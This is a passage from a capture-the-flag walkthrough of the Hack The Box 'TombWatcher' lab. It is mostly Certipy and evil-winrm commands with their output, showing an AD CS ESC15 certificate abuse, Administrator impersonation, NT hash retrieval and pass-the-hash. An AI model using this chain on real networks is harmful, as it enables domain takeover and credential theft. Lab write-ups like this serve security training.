    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : TOMBWATCHER.HTB\Administrators
      Access Rights
        ManageCa                        : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        ManageCertificates              : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Enroll                          : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-16T00:57:49+00:00
    Template Last Modified              : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.

certipy-ad find -vulnerable -u cert_admin@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout

ESC15 Vulnerabilities: Enrollee supplies subject and schema version is 1

To understand more about the ESC15 vulnerability, click here.

After gaining access as cert_admin, I leveraged a misconfigured certificate template (WebServer) that allowed low-privileged users to enroll certificates with the Certificate Request Agent OID. This made it possible for cert_admin to later request certificates on behalf of other users, including Administrator.

I issued a certificate to cert_admin with CRA permissions:

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -application-policies 'Certificate Request Agent'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'cert_admin.pfx'
[*] Wrote certificate and private key to 'cert_admin.pfx'

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -application-policies 'Certificate Request Agent'

Although the certificate had no identity of its own, it could now be used to impersonate users via a vulnerable template, completing an ESC15 attack chain.

After compromising the cert_admin account, I enumerated the AD CS environment and found that the User certificate template was vulnerable to ESC15 (allows ENROLLEE_SUPPLIES_SUBJECT, and cert_admin had Certificate Request Agent permissions).

I leveraged this misconfiguration to request a certificate on behalf of the domain administrator using:

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'User' -pfx 'cert_admin.pfx' -on-behalf-of 'TOMBWATCHER\Administrator'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

$certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Test1234.' -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'User' -pfx 'cert_admin.pfx' -on-behalf-of 'TOMBWATCHER\Administrator'$

This gave me a certificate and private key (administrator.pfx) that I used to authenticate as the Administrator:

certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator@tombwatcher.htb'
[*]     Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc

certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'

At this point, I had full domain admin access via PKINIT certificate authentication. After I got the hash "f61db423bebe3328d33af26741afe5fc" for administrator@tombwatcher.htb', I attempted to authenticate to the Windows host at 10.10.11.72 using the Administrator account and an NTLM hash (f61db423bebe3328d33af26741afe5fc) instead of the real password by running the following in my terminal:

evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc

evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc

After obtaining the evil-winrm shell, I ran the following script to obtain the root flag (Explanation: type was used to display the contents of the file named root.txt located in the Desktop directory one level above the current working directory, which is similar to cat in Linux):

type ../desktop/root.txt

Hurray, I got the root flag!!!

tombwatcher hack the box gif funny image

If you enjoy reading my walkthrough, do not forget to like, comment, and subscribe to my YouTube channel and also connect with me on LinkedIn. Also, don't forget to turn on post notification on my YouTube channel and medium to get notification as soon as I write.

Subscribe to my YouTube channel: https://www.youtube.com/@BoltechTechnologies1

Follow me on LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/

Follow me on Medium: https://medium.com/@ibrahimbolaji50.ib

Follow me on Twitter: https://x.com/Isiaq_Ibrahim99

Follow me on Twitter: https://x.com/BoltechNG

Buy me a coffee: https://buymeacoffee.com/boltechtechnologies